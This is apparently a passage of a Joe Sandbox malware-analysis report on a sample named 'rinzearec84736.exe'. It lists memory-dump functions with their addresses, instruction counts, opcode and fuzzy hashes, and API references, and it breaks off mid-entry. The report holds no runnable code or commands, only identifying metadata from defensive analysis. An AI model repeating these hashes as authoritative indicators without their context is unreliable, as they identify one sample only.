Uniqueness Score: -1.00%

Function 049238C1 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.925046790.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4920000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d2eb4700586d17753026fc8afa3ac65478f6c1df5ddd35fc6adf777fcb7d06b
Instruction ID: 725433fe4883859d2d55132ce7b4c2f2b36d2073ebb7b15e1e2b7a4e1d4c7948
Opcode Fuzzy Hash: 2d2eb4700586d17753026fc8afa3ac65478f6c1df5ddd35fc6adf777fcb7d06b
Instruction Fuzzy Hash: 79119F749052688FCB60DF68C988B9CB7B2EB88300F1045E9E50EA73A1DB355ED0CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0012D1C0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.921080505.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12d000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12416eacbbb3e24f4b2cb06bb9e69bb81a2f12043c776990a21c99dfc7e7df8f
Instruction ID: 62964cd3cfeb0951da2a7f197222b18be309a87d3456e0409f6935bca0adb75a
Opcode Fuzzy Hash: 12416eacbbb3e24f4b2cb06bb9e69bb81a2f12043c776990a21c99dfc7e7df8f
Instruction Fuzzy Hash: 84F06271444354AEEB108A15E888B66FFD8EB51734F28C45AED085B286C378DC44CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 049269F9 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.925046790.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4920000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dd17debb9994b356c740038efaa74f0c67374872b640bbce271b48a7143bea1
Instruction ID: a7e540a14d99d604c2c68278563682fe33fe9b03fac3c6ab366a71e1e8ae0e14
Opcode Fuzzy Hash: 1dd17debb9994b356c740038efaa74f0c67374872b640bbce271b48a7143bea1
Instruction Fuzzy Hash: 66F05E30E49248EFCB00DFB4EA45AADBFB4EB4A301F1096A9C80AA3255D7705A55DF41

Uniqueness

Uniqueness Score: -1.00%

Function 04926A08 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.925046790.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4920000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dc816bc5ffa4d8231a7452ac1b9a6eddc4541f3c846bd0481d7966531848c26
Instruction ID: 4597791a5fcd603b60bea0bcb2f922545f4b187cdbd326a0667455eac2f48077
Opcode Fuzzy Hash: 2dc816bc5ffa4d8231a7452ac1b9a6eddc4541f3c846bd0481d7966531848c26
Instruction Fuzzy Hash: C0F03930E04208EFC704DFA4EA48AADBBB9EB49301F10D5A9880AA3314E7306A51DF40

Uniqueness

Uniqueness Score: -1.00%

Function 04926649 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.925046790.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4920000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eb7b1170a58d7191667e672b9f1f54942a67473d2d38c58c86aad64520f9ac8
Instruction ID: db34ed7d48e9a466be070bb2c7f550d702979a939d5748d86d1926b76b7593bb
Opcode Fuzzy Hash: 5eb7b1170a58d7191667e672b9f1f54942a67473d2d38c58c86aad64520f9ac8
Instruction Fuzzy Hash: 8DF052B0C05308EFCB12DFA8D94878DBFB4EF45300F0086AAE844A7660D3364A50DF90

Uniqueness

Uniqueness Score: -1.00%

Function 04921CFF Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.925046790.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4920000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d209327660a93339f9c55f20f71caabf064a326c4662b667097f6931c11a084a
Instruction ID: 6e7568a06df1028a7296d8e614faa9e0985aaa3733ffcabc4960dd6a1bd0163b
Opcode Fuzzy Hash: d209327660a93339f9c55f20f71caabf064a326c4662b667097f6931c11a084a
Instruction Fuzzy Hash: 44F0B2709156A9CFCB65DF54DD84BA8B7B9FB08306F0449E9D50EA6264DB742BC48F00

Uniqueness

Uniqueness Score: -1.00%

Function 04926328 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.925046790.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4920000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76beab03ce741fb27a64771a3b643ac5f2361f578fb6fe7f22efac8484091f61
Instruction ID: 0126b135fc94dfce7501b492cd1e0db1d12ea8dfd239141f3521a0afb25e91f2
Opcode Fuzzy Hash: 76beab03ce741fb27a64771a3b643ac5f2361f578fb6fe7f22efac8484091f61
Instruction Fuzzy Hash: 40F052B0D08348EFCB22DFA4D90439DBBB0EF05304F0081EEC88497261C7350A10CB40

Uniqueness

Uniqueness Score: -1.00%

Function 049264B9 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.925046790.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4920000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c07c086013431fa28d43f41542aee7367ca53ef508d3aa2ccef68d54d84d81f
Instruction ID: 36aed1ebd3411a0467cdf6561a0fdaa861fb70964ad923f25bb92e7bf4163149
Opcode Fuzzy Hash: 5c07c086013431fa28d43f41542aee7367ca53ef508d3aa2ccef68d54d84d81f
Instruction Fuzzy Hash: 97E09AB0809688CFD741EFB4EA49788BFB0AF46205F0009EEC88893262D7340A48CB11

Uniqueness

Uniqueness Score: -1.00%

Function 04926658 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.925046790.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4920000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8f944faa7c42137e873eac3491da79b3ca221a0e5e551e2342ea1fe2aa0ec2d
Instruction ID: 13138dd9b9b1e11e876499d5d27fc0b8d10fcb03692ddbfa7ec4aa18d958c14e
Opcode Fuzzy Hash: f8f944faa7c42137e873eac3491da79b3ca221a0e5e551e2342ea1fe2aa0ec2d
Instruction Fuzzy Hash: 58E01274D00308EFCB04DFA8D64069DBBB9EB48300F1080AAD804A3720D736AA90DF81

Uniqueness

Uniqueness Score: -1.00%

Function 04926338 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.925046790.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4920000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7da419971fc63670892f509b6126c184e60ea5e7659c02a3de4e5ab41f4c2429
Instruction ID: d1fb85d7c2677343bf770d46bef74467e4edff50f8a3487df518d5bab5507e3f
Opcode Fuzzy Hash: 7da419971fc63670892f509b6126c184e60ea5e7659c02a3de4e5ab41f4c2429
Instruction Fuzzy Hash: 33E01270D00208EFCB14EFA8D64029DBBB8EB48300F1080AA8848A3310D7359A40CF81

Uniqueness

Uniqueness Score: -1.00%

Function 049264C8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.925046790.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4920000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01b7221b3df376bc79e9fe25ee48282da98661bac3102bc67b2af2e8388788fd
Instruction ID: d44660388ea15be652c911810178a92f558a4921f17ab22bf97c80c453069db2
Opcode Fuzzy Hash: 01b7221b3df376bc79e9fe25ee48282da98661bac3102bc67b2af2e8388788fd
Instruction Fuzzy Hash: 34E01270D11208DFC744EFF8EA4579CBBF8EB04201F5004A9884893350E7355A44CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0492376C Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.925046790.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4920000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4d71dd23239970602f4747c8535cd3e7d97ae5139b3a94cf667b2c21c502374
Instruction ID: fe49069f4fc33bd036779999113db9a6eeb966a5e7bb44c210fbc59c62a1e5ff
Opcode Fuzzy Hash: d4d71dd23239970602f4747c8535cd3e7d97ae5139b3a94cf667b2c21c502374
Instruction Fuzzy Hash: B3D092B8A01228CBDB20EF54C955B89BBF2BB54300F0095D5D529A7302D7B09F958E45

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04920048 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

w, xrefs: 04921AA0

Memory Dump Source

Source File: 00000005.00000002.925046790.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4920000_rinzearec84736.jbxd

Similarity

API ID:
String ID: w
API String ID: 0-476252946
Opcode ID: 8eae9bf2c645ff6d48e6b2f17f72c7d20a88c89fba864a72eff7df8fccc098f5
Instruction ID: ca432b18bb881eab274d0d5d8885a3540a022b2fdaed959ebc7234774d1929f1
Opcode Fuzzy Hash: 8eae9bf2c645ff6d48e6b2f17f72c7d20a88c89fba864a72eff7df8fccc098f5
Instruction Fuzzy Hash: C74164B1E056588BEB1CCF6B8D4078EF6F7BFC8210F08C1B9850DAA219EB3516958F45

Uniqueness

Uniqueness Score: -1.00%

Function 001D55B0 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.921158360.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0914fc8ee222007069c9b95612f900d5327392df52af198202008ed56a0007c
Instruction ID: e6ba85c9834347dd8b81466e61f55da8c41c055e11768c71635a5c2b6c692913
Opcode Fuzzy Hash: a0914fc8ee222007069c9b95612f900d5327392df52af198202008ed56a0007c
Instruction Fuzzy Hash: 2C611E75E002488FD748EFAAF84568DBBF3AFC4304F04C839E5649B664EB7459458FA2

Uniqueness

Uniqueness Score: -1.00%

Function 001D5841 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.921158360.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05d9400bca961e3f48611644216eb197211c6d71e1e3d6cdf60375bd78f20840
Instruction ID: 7feb8aa8595d7eb1d861618f8ebe7ba3400e01dbfbede5b75c9c5c0684597db3
Opcode Fuzzy Hash: 05d9400bca961e3f48611644216eb197211c6d71e1e3d6cdf60375bd78f20840
Instruction Fuzzy Hash: 42414771D05A588BEB5CCF6B9D4069EFAF3AFC8200F18C1BAC81DA7225EB3505568E51

Uniqueness

Uniqueness Score: -1.00%

Function 04920006 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.925046790.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4920000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16f69162b81ad517f94c5c2fe8f9bf0e78e319fd2ec1976ab9b1b7b64f498789
Instruction ID: fa04e5424ff493bb3fcf4fdc8c8bbba8520df099fe605dbc8d3aa9e62286c25f
Opcode Fuzzy Hash: 16f69162b81ad517f94c5c2fe8f9bf0e78e319fd2ec1976ab9b1b7b64f498789
Instruction Fuzzy Hash: 49418071D05A598FE71DCF6B8D00689FBF3AFC9200F18C1FAC448AA265DB350A568F11

Uniqueness

Uniqueness Score: -1.00%

Function 001D5850 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.921158360.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00a1b1630d8e9516e3f40970a0f5fd7090a536786106e3abcf2313497984d0fa
Instruction ID: e25e74b95123b11ec5b89f5a065e00d544e4579fba11987cb5b4e49980af92c2
Opcode Fuzzy Hash: 00a1b1630d8e9516e3f40970a0f5fd7090a536786106e3abcf2313497984d0fa
Instruction Fuzzy Hash: 4F413C71D01A188BEB5CCF6BCC4079EFAF7AFC8311F18C1BA841DA6264EB3509858E51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rinzearec84736.exePID: 648, Parent PID: 296COMMON

Execution Graph

Execution Coverage:	20.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	22.1%
Total number of Nodes:	272
Total number of Limit Nodes:	0

Executed Functions

Function 001C65A1 Relevance: 4.3, Strings: 1, Instructions: 3074COMMON

Download Yara Rule

Strings

N, xrefs: 001C998F

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: cd1878ab1822d9dee941c9c4f2f2406e3cf4f592d7de59f37f0c055c500d278b
Instruction ID: 7cb442f794b183d8971fe7aca8c9fe075fb9a27e61c1d583afb53d8d28522bbc
Opcode Fuzzy Hash: cd1878ab1822d9dee941c9c4f2f2406e3cf4f592d7de59f37f0c055c500d278b
Instruction Fuzzy Hash: 7673D331D1475A8ECB15EFA8C884AE9F7B1FF95304F5186DAE4486B121EB70AAC4CF41

Uniqueness

Uniqueness Score: -1.00%

Function 001C3D69 Relevance: 1.8, APIs: 1, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 001C3E44

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b8b36a536c4b1fe9ce3cd3b04370584c5277049fd272d94b669821365edcf1fd
Instruction ID: eee4dbb5a54e313e8403d9fcbe04e8b66ff2c1de24b3b6f025abb4a8189d138b
Opcode Fuzzy Hash: b8b36a536c4b1fe9ce3cd3b04370584c5277049fd272d94b669821365edcf1fd
Instruction Fuzzy Hash: 67D1B174E00218CFDB54DFA5C994BDDBBB2BF89304F2081AAD409AB355DB359A85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00268B20 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00268BEC

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ab6126581db59933071dd233df67f8a5400fcf0f8adb3c4307e20de059c66e22
Instruction ID: 9ee8fb0b04543f79af400a2f55b8a1e4d089b94fb37cb38b3ab16df20fd813e7
Opcode Fuzzy Hash: ab6126581db59933071dd233df67f8a5400fcf0f8adb3c4307e20de059c66e22
Instruction Fuzzy Hash: C8C1B174E00218CFDB54DFA5D990B9DBBB2BF89304F2081AAD409AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00269828 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002698F3

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4c8f46a7b67e8404bb5d21ed642dd8ef78a7c67501bee886d90d827a3975f273
Instruction ID: aec7c484968565ff2c893347a25fa99e3ffc1c3eeca672754f871c50eb5c6d83
Opcode Fuzzy Hash: 4c8f46a7b67e8404bb5d21ed642dd8ef78a7c67501bee886d90d827a3975f273
Instruction Fuzzy Hash: 37C1AE74E00218CFDB54DFA5C994BADBBB6BF89304F2081AAD409AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0026A530 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0026A5FB

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 339a9f363df34143298972aabb6cf351455ffa3df41865b8e5f60dc33a7778bc
Instruction ID: b7cc45a719d325c1072d11c4eb8d2b8c6d453c7dd1c303c68fb5c1fc968f0b40
Opcode Fuzzy Hash: 339a9f363df34143298972aabb6cf351455ffa3df41865b8e5f60dc33a7778bc
Instruction Fuzzy Hash: 6DC1BD74E10218CFDB64DFA5C990B9DBBB2BF89304F2081AAD409AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00261600 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002616CB

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ce0316702f14e8d65e6a0cbcb52715798d5d126e56ad60f20c16eec97a32389d
Instruction ID: ee66bb49c4fc2834f17ab57b5f8be8fbc9375449029f120ee28c246c2596bcf4
Opcode Fuzzy Hash: ce0316702f14e8d65e6a0cbcb52715798d5d126e56ad60f20c16eec97a32389d
Instruction Fuzzy Hash: 14C1BE74E00218CFDB64DFA5C990B9DBBB2BF89304F2481AAD409AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00262308 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002623D3

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b9cba07458914ffe1e8062e20def79b2a7f6c8f46fdc2fdaf0dcaed77ebfcdb6
Instruction ID: 2d240976cd991240b43846f28d51fa3b7f06220678ea733bdd1e27df865fdc21
Opcode Fuzzy Hash: b9cba07458914ffe1e8062e20def79b2a7f6c8f46fdc2fdaf0dcaed77ebfcdb6
Instruction Fuzzy Hash: A3C1BF74E00218CFDB64DFA5C990B9DBBB6BF89304F2081AAD409AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00263010 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002630DB

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b280eddafe3a20602dc2ba2c47a5103bc1105ebaa2e52a7814c139a9349db606
Instruction ID: e3d262290541d719036115893b3d871a62f6080f2393196fe22e3567058aa1a2
Opcode Fuzzy Hash: b280eddafe3a20602dc2ba2c47a5103bc1105ebaa2e52a7814c139a9349db606
Instruction Fuzzy Hash: 7AC1AF74E00218CFDB54DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00262760 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 0026282B

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d2a779ed5d9caf99dd6e30962b71de59ccd52738d2d87fafc971f21271418b8c
Instruction ID: 0cd37835e29ea6f7e222bd5e10007841e71665b4b9a06d197ccb079c716808c2
Opcode Fuzzy Hash: d2a779ed5d9caf99dd6e30962b71de59ccd52738d2d87fafc971f21271418b8c
Instruction Fuzzy Hash: BBC1AD74E00218CFDB64DFA5C994B9DBBB2FF89304F2081AAD409AB355DB359A85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00266C68 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 00266D33

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 05cbeaf6293cf79379f1c324cc666ffd43a44cec29d5d5edbcf3a894d0f3ae27
Instruction ID: 34af68a699d9fe5af2d2ed0cc86ad75cb2a5ca7613c0db108c9443949e1ae6d1
Opcode Fuzzy Hash: 05cbeaf6293cf79379f1c324cc666ffd43a44cec29d5d5edbcf3a894d0f3ae27
Instruction Fuzzy Hash: 6FC1BE74E00218CFDB64DFA5D994B9DBBB2BF89304F2081AAD409AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00263468 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 00263533

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 89bcd6a7a7d07031b0b15d5ad882684da77c8bceca7aef3c7bf1af1fcb44012b
Instruction ID: 4fc447652dacadd3693bedfd05eae7021414f2ff3f5e8fd62879251378c89ac1
Opcode Fuzzy Hash: 89bcd6a7a7d07031b0b15d5ad882684da77c8bceca7aef3c7bf1af1fcb44012b
Instruction Fuzzy Hash: FAC1AE74E00218CFDB54DFA5C994BDDBBB2BF89304F2081AAD509AB355DB359A85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00268F78 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00269043

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 556c7d7c7b210870f1fe3e902e21491d4f066647d7969835415e8fe3d6e05f48
Instruction ID: 6a4348e33927b16f188748f4b52a370c52b32096e9b63fac102ebb6eb9bb5bc2
Opcode Fuzzy Hash: 556c7d7c7b210870f1fe3e902e21491d4f066647d7969835415e8fe3d6e05f48
Instruction Fuzzy Hash: 5DC1CE74E00218CFDB64DFA5C990BDDBBB6BF89304F2081AAD409AB355DB359A85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00267540 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0026760B

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: cb6ee0e063c5d1bb01bb32585e6d27c55f9c210300d30f20c8b3e75d0cd6765a
Instruction ID: 28e3d2822591b71bd963253442b25f31270859212e87f570906ac35a13aaeff1
Opcode Fuzzy Hash: cb6ee0e063c5d1bb01bb32585e6d27c55f9c210300d30f20c8b3e75d0cd6765a
Instruction Fuzzy Hash: A8C1BF74E00218CFDB54DFA5D990B9DBBB2BF89304F2081AAD409AB355DB359A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00268248 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00268313

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 212de2e0391581d0fdb526d46a2065f9d81bd84740a704f2e21d45f750d1d057
Instruction ID: e4f59b176f8ebbbe2735ff7b775b5788583afb02d565dd942b9f7976b6315268
Opcode Fuzzy Hash: 212de2e0391581d0fdb526d46a2065f9d81bd84740a704f2e21d45f750d1d057
Instruction Fuzzy Hash: 65C1BE74E00218CFDB64DFA5C990B9DBBB6BF89304F2081AAD509AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00260048 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 00260113

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d7021f235ab9bfdce4e6d66b4c5b5c211ee486df93f1f86f3db370f2be16c81f
Instruction ID: 95520890a68a05f7575884902bc88f5666ad01982cc319efab59d7d401673f0f
Opcode Fuzzy Hash: d7021f235ab9bfdce4e6d66b4c5b5c211ee486df93f1f86f3db370f2be16c81f
Instruction Fuzzy Hash: 1CC1B174E00218CFDB54DFA5C994B9EBBB2BF89304F2081AAD509AB355DB359A85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00260D50 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 00260E1B

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
